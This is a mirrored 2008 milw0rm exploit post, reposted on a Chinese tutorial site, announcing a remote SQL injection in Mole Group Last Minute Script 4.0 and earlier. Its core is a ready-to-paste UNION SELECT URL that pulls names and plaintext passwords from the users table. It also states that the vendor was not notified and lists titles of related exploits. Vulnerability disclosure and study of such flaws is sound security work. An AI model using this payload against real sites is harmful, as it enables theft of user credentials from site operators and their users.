手机
当前位置:查字典教程网 >网络安全 >Exploit >Mole Group Last Minute Script
Mole Group Last Minute Script
摘要:-[*]==================================================================...

-[*] ================================================================================ [*]-

-[*] Last Minute Script <= 4.0 Remote SQL Injection Vulnerability [*]-

-[*] ================================================================================ [*]-

[*] Discovered By: t0pP8uZz

[*] Discovered On: 8 JULY 2008

[*] Script Download: http://www.mole-group.com/content/view/31/45/

[*] DORK: N/A

[*] Vendor Has Not Been Notified!

[*] DESCRIPTION:

Last Minute Script 4.0 (and all prior versions) suffer from a multirow SQL injection flaw,

This allows the remote attacker to execute arbitrary MySQL querys, and possibly gaining access

to confidential information.

below is a example.

[*] SQL Injection:

http://site.com/index.php?cid=-1/**/UNION/**/ALL/**/SELECT/**/CONVERT(CONCAT(name,0x3a,password,0x3C62723E)/**/using/**/latin1),2,3,4/**/FROM/**/users/*

[*] NOTE/TIP:

passwords are in plaintext.

There are also other SQL injections around the site which i have found, So no one even bother to post has seperate vulns.

[*] GREETZ:

milw0rm.com, h4ck-y0u.org, Offensive-Security.com, CipherCrew !

[-] Peace...

...t0pP8uZz !

-[*] ================================================================================ [*]-

-[*] Last Minute Script <= 4.0 Remote SQL Injection Vulnerability [*]-

-[*] ================================================================================ [*]-

# milw0rm.com [2008-07-08]

【Mole Group Last Minute Script】相关文章:

NoName Script

Joomla Component DT Register Remote SQL injection Vulnerability

Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit

MS Internet Explorer Recordset Double Free Memory Exploit

Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability

LoveCMS 1.6.2 Final Remote Code Execution Exploit

Comdev Web Blogger

MS Windows (MessageBox) Memory Corruption Local Denial of Service

Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit

Joomla Component n-forms 1.01 Blind SQL Injection Exploit

精品推荐
分类导航